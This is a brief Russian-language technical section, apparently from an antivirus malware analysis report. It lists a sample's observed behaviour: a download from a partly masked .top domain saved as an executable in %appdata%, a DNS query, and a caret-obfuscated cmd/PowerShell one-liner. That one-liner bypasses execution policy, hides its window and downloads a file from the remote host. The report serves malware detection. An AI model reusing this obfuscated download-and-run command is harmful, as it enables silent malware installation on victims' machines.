Техническая информация
- http://zo###aseo.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^wE^rSheLl^.^EX^e^ -ExeCUTio^N^poliC^y ^B^yp^aSs^ -^NOproFi^l^E^ -W^in^dO^WsTYLE HIdDEN (new^-O^bJ^ecT ^s^ysTeM^.^net.^w^E^b^C^LIe^Nt^).^Do^Wn^l^Oa^d^F^iLE(^'http://zo###aseo....
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "p^o^wE^rSheLl^.^EX^e^ -ExeCUTio^N^poliC^y ^B^yp^aSs^ -^NOproFi^l^E^ -W^in^dO^WsTYLE HIdDEN (new^-O^bJ^ecT ^s^ysTeM^.^net.^w^E^b^C^LIe^Nt^).^Do^Wn^l^Oa^d^F^iLE(^'http://zo###aseo....' (со скрытым окном)